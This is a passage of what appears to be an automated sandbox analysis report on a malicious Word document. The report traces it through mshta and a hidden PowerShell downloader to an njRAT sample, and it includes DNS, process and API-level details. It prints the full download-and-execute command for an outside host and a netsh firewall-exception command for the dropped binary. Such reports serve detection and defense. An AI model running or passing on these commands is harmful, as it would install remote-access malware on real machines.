Sep 30, 2019 19:58:15.402909994 CEST	51099	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:58:15.420547962 CEST	53	51099	8.8.8.8	192.168.1.109
Sep 30, 2019 19:58:17.415437937 CEST	55170	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:58:17.431072950 CEST	53	55170	8.8.8.8	192.168.1.109
Sep 30, 2019 19:58:19.430598021 CEST	59614	53	192.168.1.109	8.8.8.8
Sep 30, 2019 19:58:19.448528051 CEST	53	59614	8.8.8.8	192.168.1.109

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 30, 2019 19:56:32.900871038 CEST	192.168.1.109	8.8.8.8	0x5ebe	Standard query (0)	1.top4top.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:56:53.715348959 CEST	192.168.1.109	8.8.8.8	0x6c95	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:56:55.740056038 CEST	192.168.1.109	8.8.8.8	0x47fd	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:56:57.778354883 CEST	192.168.1.109	8.8.8.8	0xcc16	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:56:59.836250067 CEST	192.168.1.109	8.8.8.8	0x6517	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:01.871759892 CEST	192.168.1.109	8.8.8.8	0x105c	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:03.911915064 CEST	192.168.1.109	8.8.8.8	0xb6a8	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:05.951246977 CEST	192.168.1.109	8.8.8.8	0xdf17	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:08.788209915 CEST	192.168.1.109	8.8.8.8	0x1c19	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:10.838875055 CEST	192.168.1.109	8.8.8.8	0xc878	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:12.871876001 CEST	192.168.1.109	8.8.8.8	0xfc8b	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:14.916412115 CEST	192.168.1.109	8.8.8.8	0x9386	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:16.955725908 CEST	192.168.1.109	8.8.8.8	0xcd2d	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:18.994354010 CEST	192.168.1.109	8.8.8.8	0x9388	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:21.036051989 CEST	192.168.1.109	8.8.8.8	0x522	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:23.052674055 CEST	192.168.1.109	8.8.8.8	0xc9ab	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:25.091790915 CEST	192.168.1.109	8.8.8.8	0x8828	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:27.339652061 CEST	192.168.1.109	8.8.8.8	0xadd0	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:29.367206097 CEST	192.168.1.109	8.8.8.8	0x52ff	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:31.388187885 CEST	192.168.1.109	8.8.8.8	0xa261	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:33.414738894 CEST	192.168.1.109	8.8.8.8	0x4e19	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:35.454436064 CEST	192.168.1.109	8.8.8.8	0x2229	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:37.491142988 CEST	192.168.1.109	8.8.8.8	0xa4db	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:39.539130926 CEST	192.168.1.109	8.8.8.8	0xbd9e	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:41.572222948 CEST	192.168.1.109	8.8.8.8	0x9ff0	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:43.598114014 CEST	192.168.1.109	8.8.8.8	0x8886	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:45.757297039 CEST	192.168.1.109	8.8.8.8	0x8abd	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:48.564148903 CEST	192.168.1.109	8.8.8.8	0x3452	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:50.588753939 CEST	192.168.1.109	8.8.8.8	0x1a65	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:52.626724958 CEST	192.168.1.109	8.8.8.8	0xc07b	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:54.659141064 CEST	192.168.1.109	8.8.8.8	0x8c72	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:56.691517115 CEST	192.168.1.109	8.8.8.8	0xd9e5	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:57:58.736772060 CEST	192.168.1.109	8.8.8.8	0xfe78	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:58:00.826756001 CEST	192.168.1.109	8.8.8.8	0x356c	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:58:02.851628065 CEST	192.168.1.109	8.8.8.8	0xc85b	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:58:04.888936996 CEST	192.168.1.109	8.8.8.8	0x6d04	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:58:06.913865089 CEST	192.168.1.109	8.8.8.8	0xb52e	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:58:09.382396936 CEST	192.168.1.109	8.8.8.8	0xe7e4	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:58:11.400198936 CEST	192.168.1.109	8.8.8.8	0xecb6	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:58:13.401148081 CEST	192.168.1.109	8.8.8.8	0xe9b	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:58:15.402909994 CEST	192.168.1.109	8.8.8.8	0xa626	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:58:17.415437937 CEST	192.168.1.109	8.8.8.8	0x7192	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2019 19:58:19.430598021 CEST	192.168.1.109	8.8.8.8	0xab3	Standard query (0)	amibas8722.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 30, 2019 19:56:32.910985947 CEST	8.8.8.8	192.168.1.109	0x5ebe	No error (0)	1.top4top.net	a.top4top.net		CNAME (Canonical name)	IN (0x0001)
Sep 30, 2019 19:56:32.910985947 CEST	8.8.8.8	192.168.1.109	0x5ebe	No error (0)	a.top4top.net		163.172.46.38	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Sep 30, 2019 19:56:33.025161982 CEST	163.172.46.38	443	192.168.1.109	49163	CN=*.top4top.net, OU=Domain Control Validated CN=AlphaSSL CA - SHA256 - G2, O=GlobalSign nv-sa, C=BE	CN=AlphaSSL CA - SHA256 - G2, O=GlobalSign nv-sa, C=BE CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Sat Mar 03 19:33:39 CET 2018 Thu Feb 20 11:00:00 CET 2014	Fri Apr 03 03:59:45 CEST 2020 Tue Feb 20 11:00:00 CET 2024	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Sep 30, 2019 19:56:33.025161982 CEST	163.172.46.38	443	192.168.1.109	49163	CN=AlphaSSL CA - SHA256 - G2, O=GlobalSign nv-sa, C=BE	CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Thu Feb 20 11:00:00 CET 2014	Tue Feb 20 11:00:00 CET 2024		05af1f5ca1b87cc9cc9b25185115607d

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2632 Parent PID: 584

General

Start time:	19:55:28
Start date:	30/09/2019
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x2fad0000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: dllhost.exe PID: 4024 Parent PID: 584

General

Start time:	19:55:29
Start date:	30/09/2019
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Imagebase:	0x140000
File size:	7168 bytes
MD5 hash:	A63DC5C2EA944E6657203E0C8EDEAF61
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: verclsid.exe PID: 2232 Parent PID: 2632

General

Start time:	19:55:53
Start date:	30/09/2019
Path:	C:\Windows\System32\verclsid.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\verclsid.exe' /S /C {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
Imagebase:	0x630000
File size:	10752 bytes
MD5 hash:	42B2A7CBD7838214EECE6B6455C34BC6
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: mshta.exe PID: 1736 Parent PID: 584

General

Start time:	19:55:53
Start date:	30/09/2019
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe -Embedding
Imagebase:	0x12b0000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: mshta.exe PID: 1816 Parent PID: 584

General

Start time:	19:55:54
Start date:	30/09/2019
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe -Embedding
Imagebase:	0x12b0000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: mshta.exe PID: 2312 Parent PID: 2632

General

Start time:	19:55:59
Start date:	30/09/2019
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'C:\Users\user\AppData\Local\Temp\Exploit (2).hta'
Imagebase:	0x12b0000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2420 Parent PID: 3168

General

Start time:	19:56:00
Start date:	30/09/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'
Imagebase:	0x4aab0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 2344 Parent PID: 2420

General

Start time:	19:56:00
Start date:	30/09/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'
Imagebase:	0x22640000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Njrat, Description: detect njRAT in memory, Source: 00000009.00000002.520219680.023FF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: 00000009.00000002.520219680.023FF000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	high

Chronological Activities

Analysis Process: exploit.exe PID: 3068 Parent PID: 2344

General

Start time:	19:56:07
Start date:	30/09/2019
Path:	C:\Users\user\AppData\Local\Temp\exploit.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Temp\exploit.exe'
Imagebase:	0x1d0000
File size:	24064 bytes
MD5 hash:	2C0D5DF5FE0A7B992DAC6A94A3874D2B
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Njrat, Description: detect njRAT in memory, Source: 0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: 0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 0000000A.00000002.535195631.01905000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: 0000000A.00000002.535195631.01905000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: 0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: CN_disclosed_20180208_c_RID2E71, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\exploit.exe, Author: Florian Roth Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\exploit.exe, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\exploit.exe, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: dllhost.exe PID: 2612 Parent PID: 3068

General

Start time:	19:56:15
Start date:	30/09/2019
Path:	C:\Users\user\AppData\Local\Temp\dllhost.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Temp\dllhost.exe'
Imagebase:	0x210000
File size:	24064 bytes
MD5 hash:	2C0D5DF5FE0A7B992DAC6A94A3874D2B
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Njrat, Description: detect njRAT in memory, Source: 0000000B.00000000.533213752.00212000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: 0000000B.00000000.533213752.00212000.00000020.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 0000000B.00000002.756194496.00212000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: 0000000B.00000002.756194496.00212000.00000020.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: CN_disclosed_20180208_c_RID2E71, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, Author: Florian Roth Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\dllhost.exe, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: netsh.exe PID: 3012 Parent PID: 2612

General

Start time:	19:56:24
Start date:	30/09/2019
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\dllhost.exe' 'dllhost.exe' ENABLE
Imagebase:	0xa40000
File size:	96256 bytes
MD5 hash:	784A50A6A09C25F011C3143DDD68E729
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: dllhost.exe PID: 3244 Parent PID: 1560

General

Start time:	19:56:38
Start date:	30/09/2019
Path:	C:\Users\user\AppData\Local\Temp\dllhost.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Temp\dllhost.exe' ..
Imagebase:	0x210000
File size:	24064 bytes
MD5 hash:	2C0D5DF5FE0A7B992DAC6A94A3874D2B
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Njrat, Description: detect njRAT in memory, Source: 0000000F.00000000.586989058.00212000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: 0000000F.00000000.586989058.00212000.00000020.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 0000000F.00000002.600191296.00212000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: 0000000F.00000002.600191296.00212000.00000020.00020000.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low

Chronological Activities

Analysis Process: dllhost.exe PID: 392 Parent PID: 1560

General

Start time:	19:56:42
Start date:	30/09/2019
Path:	C:\Users\user\AppData\Local\Temp\dllhost.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Temp\dllhost.exe' ..
Imagebase:	0x210000
File size:	24064 bytes
MD5 hash:	2C0D5DF5FE0A7B992DAC6A94A3874D2B
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Njrat, Description: detect njRAT in memory, Source: 00000010.00000002.610854599.00212000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: 00000010.00000002.610854599.00212000.00000020.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000010.00000000.597361125.00212000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: njrat1, Description: Identify njRat, Source: 00000010.00000000.597361125.00212000.00000020.00020000.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: powershell.exe PID: 2344 Parent PID: 2420 powershell.exeCOMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.1%
Total number of Nodes:	72
Total number of Limit Nodes:	6

Executed Functions

Function 004CACB7, Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 004CAD37

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: b726a69d4eb1ed310a11f0a0884d45c6ea20f3f9ca2bd5dbf8584dacbae19a62
Instruction ID: 537b7e208004d750be26177cf2965ed9b096f69cc090581928176c2b017e113d
Opcode Fuzzy Hash: b726a69d4eb1ed310a11f0a0884d45c6ea20f3f9ca2bd5dbf8584dacbae19a62
Instruction Fuzzy Hash: 3621D3755097849FEB228F25DC44F52BFB4EF06314F0884DAE9858B663D274D918CB62

Uniqueness

Uniqueness Score: 0.38%

Function 004CACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 004CAD37

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 1952ee4e3b671e3d3af08bd01212aabc87351ae718ddf367442049f2b165865f
Instruction ID: ab6b668e89eea38d23b77738f0ab24644636708a3b3d9f7cfcb4de2ecb1fffbe
Opcode Fuzzy Hash: 1952ee4e3b671e3d3af08bd01212aabc87351ae718ddf367442049f2b165865f
Instruction Fuzzy Hash: EA119E755047449FDB608F55D884B66FBE4EB04324F08C4AEED4A8BA26D335E814DB62

Uniqueness

Uniqueness Score: 0.38%

Function 004CB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004CB329

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 5e671cfe5380d36039348af60862ea65938e454c026c99e83dd9ece3e69f0ecb
Instruction ID: 92b42957b43867c72c739c45b6d672c91f41aeb61284d60f7450ac91a8f10c11
Opcode Fuzzy Hash: 5e671cfe5380d36039348af60862ea65938e454c026c99e83dd9ece3e69f0ecb
Instruction Fuzzy Hash: AE11AC75408380AFDB228F11DC45F62FFB4EF46320F09C49EED884B662C275A918CB62

Uniqueness

Uniqueness Score: 0.01%

Function 004CB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004CB329

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 53dd2059678f44f6af917d1b8e3168958dc41fdc0434bfb4d6734887dabacf6f
Instruction ID: f8beca9c7e532482813ff66711f1feb4275b15055d474396448ab7bbdfaa7eea
Opcode Fuzzy Hash: 53dd2059678f44f6af917d1b8e3168958dc41fdc0434bfb4d6734887dabacf6f
Instruction Fuzzy Hash: 73018B354043809FDB608F45D886B22FBA0EB44720F08C49EEE490A726C379A819DBB6

Uniqueness

Uniqueness Score: 0.01%

Function 004CBBDE, Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,00000E90,4EB46642,00000000,00000000,00000000,00000000), ref: 004CBC7C

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 05bc4ec5c3e4995ccf98074e7026b8a7be472b5dd645a3980a3e028c9ce709e1
Instruction ID: 8f602331be85ee7590703a32173bbbbbada8246e8f98e5cfa6ba3b5edfdf4754
Opcode Fuzzy Hash: 05bc4ec5c3e4995ccf98074e7026b8a7be472b5dd645a3980a3e028c9ce709e1
Instruction Fuzzy Hash: 75318171409380AFE7228B61DC55FA7BFBCEF46314F09849BE985CB193D224A909C7B5

Uniqueness

Uniqueness Score: 0.09%

Function 004CAF24, Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32EnumProcessModules.KERNEL32(?,00000E90,4EB46642,00000000,00000000,00000000,00000000), ref: 004CAFBE

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: efb7dbafbbf93ac6c1cf1add36d52cde6741d7cc414dc47653484112b26b1b8f
Instruction ID: 8dc780ac1af209bdf58a6c7dfcd062247c446e623966c94f2271399c7818f575
Opcode Fuzzy Hash: efb7dbafbbf93ac6c1cf1add36d52cde6741d7cc414dc47653484112b26b1b8f
Instruction Fuzzy Hash: F421D5B24093806FD7128B61DC45F96BFB8EF46324F0884DBE984DB193D325A905C775

Uniqueness

Uniqueness Score: 0.95%

Function 004CB01D, Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleInformation.KERNEL32(?,00000E90,4EB46642,00000000,00000000,00000000,00000000), ref: 004CB0AE

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 2b9884c73b22cbeebef341e38b7e3d7c4b8d9bb86194af3f37b5bddaec937b53
Instruction ID: 5135ea4033896fb98cfc9129ead7ffcca6ad99a58af05db92ce324cd33f7550f
Opcode Fuzzy Hash: 2b9884c73b22cbeebef341e38b7e3d7c4b8d9bb86194af3f37b5bddaec937b53
Instruction Fuzzy Hash: CF218275509380AFE7218B55CC45F67BFACEF46320F08849AE945CB252D368A908CBA5

Uniqueness

Uniqueness Score: 10.55%

Function 004CB114, Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E90,?,?), ref: 004CB1BA

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 8984e791ca23f2e22b2d5a5574ddd4742e64fbfd1fb86ff82e466bfa74463b30
Instruction ID: 37b22a1a12d043ee7a776711e829aaa7a75bd40314e5686329d0d040ee6d9af6
Opcode Fuzzy Hash: 8984e791ca23f2e22b2d5a5574ddd4742e64fbfd1fb86ff82e466bfa74463b30
Instruction Fuzzy Hash: 0721A0715093C06FD312CB65CC55B66BFB8EF87614F0984DBD8848F6A3D224A909C7B2

Uniqueness

Uniqueness Score: 0.16%

Function 004CA8B4, Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RasEnumConnectionsW.RASAPI32(?,00000E90,?,?), ref: 004CA94A

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: fa3e07c579150ccd6f5575d90540a469e53e04d66086f6897538eec8c5f445d3
Instruction ID: f8f5651e5c03a18de208a51c984361c995c6104c0f5d6cbe8efc71c9f4abfe3c
Opcode Fuzzy Hash: fa3e07c579150ccd6f5575d90540a469e53e04d66086f6897538eec8c5f445d3
Instruction Fuzzy Hash: F021957540D3C06FD3128B259C51B62BFB8EF87B14F0A41DBE8448B653D224A919C7B6

Uniqueness

Uniqueness Score: 2.04%

Function 004CB1F0, Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExitCodeProcess.KERNEL32(?,00000E90,4EB46642,00000000,00000000,00000000,00000000), ref: 004CB268

Memory Dump Source

Source File: 00000009.00000002.516457486.004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4ca000_powershell.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
